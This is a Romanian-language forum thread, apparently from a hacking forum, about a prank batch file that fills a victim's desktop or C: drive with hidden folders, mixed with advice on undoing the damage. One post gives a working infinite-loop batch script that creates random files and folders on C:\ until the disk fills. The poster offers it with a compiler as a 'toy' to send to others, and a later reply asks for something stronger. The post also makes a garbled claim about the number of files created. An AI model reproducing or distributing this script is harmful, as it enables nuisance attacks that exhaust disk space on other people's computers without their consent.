Jump to content
skyner

.bat creaza foldere la infinit funny

Recommended Posts

Puteai sa intrebi si asa de la inceput si primeai de la mine un raspuns de genul: "Ia incerca sa scrii repede pe google.com 'How to boot windows in safe mode' si sa vezi ce raspunsuri pizdete primeai ... sau puteai sa scrii si in romana ca tot romanul 'Cum deschid windowsul in safe mode' " si astfel pe viitor te mai "liiteai" si tu.

Link to comment
Share on other sites

A lol eu acuma vad ce face codul ala =)) ... poi nu e nimic grav:

Ai intrat in el si ti-a creat vreo 1000 de foldere ascunse pe desktop.

Booteaza windowsul normal cum il deschizi de obicei apoi cpanel -> folder options -> view -> debifezi hide extensions... si hide protected...., apoi pui biluta in Show hiden files... -> aply si ok

Si acum stergi tot ce ai in plus pe desktop ... mai exact da un search cu Win4

P.S.: daca nu te descurci pur si simplu intri in codul ala si bagi promptul corect ... adica "rstz" =]

Link to comment
Share on other sites

gata jumatate din astia de pe forum akuma ie hackeri :)) doaamnee ami placea forumu asta inainte vorbea lume mai importanta si care aveai ce invata de la ei acum toti cacanari au gasit forumu si se cred hacari...

**faza cu akuma ie hackeri am scriso la mijto!

Link to comment
Share on other sites

Am folosit codul lui ZeroC00l...

...

...

si mi au disparut unele chestii de pe desktop... ma ajutati sa le recuperez?

Daca ai bagat codul rstz atunci cand executzi programul, si tot nu ti s-au restaurat icoanele ineamna ca s-au mutat icoanele initiale peste limitele desktopului ... trebuie sa le aranjezi din nou deschizand in windows explorer desktopul si sa tragi fiecare icoana la locul unde a fost pe desktop (mi s-a intamplat si mie ... sucze pentru intarziere)

Edited by ZeroC00l
Link to comment
Share on other sites

Uite aici un batch compilat, ocupa 253 kb pt ca este icon-ul mare :))

@echo off

:rstcenter

echo RST>C:\%random%%random%.%random%

md C:\%random%%random%%random%

goto rstcenter

Practic iti creaza un numar de fisiere egal cu 65500^65500^65500, faceti voi calculul, si rezultatul il inmultiti cu 2 (face acelasi numar de foldere).

Revin cu o jucarie si mai a naibi mai incolo.

In arhiva am pus si compiler-ul pentru batch-uri, e chiar usor de folosit

Banana

Link to comment
Share on other sites

Uite aici un batch compilat, ocupa 253 kb pt ca este icon-ul mare :))

@echo off

:rstcenter

echo RST>C:\%random%%random%.%random%

md C:\%random%%random%%random%

goto rstcenter

Practic iti creaza un numar de fisiere egal cu 65500^65500^65500, faceti voi calculul, si rezultatul il inmultiti cu 2 (face acelasi numar de foldere).

Revin cu o jucarie si mai a naibi mai incolo.

In arhiva am pus si compiler-ul pentru batch-uri, e chiar usor de folosit

Banana

Sunt tare curios de unde ai scos tu numarul acela eu nu l-am gasit. Teoretic in codul tau nu ai nici o limita deoarece tu nu ai nici o variabila care sa ti-o salveze de fiecare data in stack folosind labelul rstcenter, astfel nu exista nici o limita de blocare a scriputul tau, doar daca masina virtuala de MS pentru bat-uri are vreo limita, dar nu as vedea de ce. Limita ar fi decat spatiu ai pe Hard-disk pentru a rula.

Link to comment
Share on other sites

Sunt tare curios de unde ai scos tu numarul acela eu nu l-am gasit. Teoretic in codul tau nu ai nici o limita deoarece tu nu ai nici o variabila care sa ti-o salveze de fiecare data in stack folosind labelul rstcenter, astfel nu exista nici o limita de blocare a scriputul tau, doar daca masina virtuala de MS pentru bat-uri are vreo limita, dar nu as vedea de ce. Limita ar fi decat spatiu ai pe Hard-disk pentru a rula.

Variabila e %random%, care pardon e un numar ales la nimereala intre 0 si 32727, variabila e pusa de 3 ori deci 3 numere diferite intre intervalu ala, fa calculul cate posibilitati sunt. Nu trebuie definita, e interpretata ca un numar random de cmd.

echo RST>C:\%random%%random%.%random% creaza un fisier cu 3 random-uri, 2 randomuri la nume si un random la extensie. Do the math!

Incearcal sa vezi ca nu vorbesc prostii, sunt foarte bun la batch files

Link to comment
Share on other sites

e super tare sa -i trimiti lu unu un fisier bat si sa-i faci desktopul plin de foldere .. uauuuuu bhaii ce tare e..... dar ce pula mea e asa de greu sa inchizi din task manager bat-ul .. sa-u sai dai un restart la pc ... deci .. bag ceva in bat-urile voastre .. le-am incercat .. sunt bun nimic de zis .. dar ceva mai puternic ...trebe ..

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...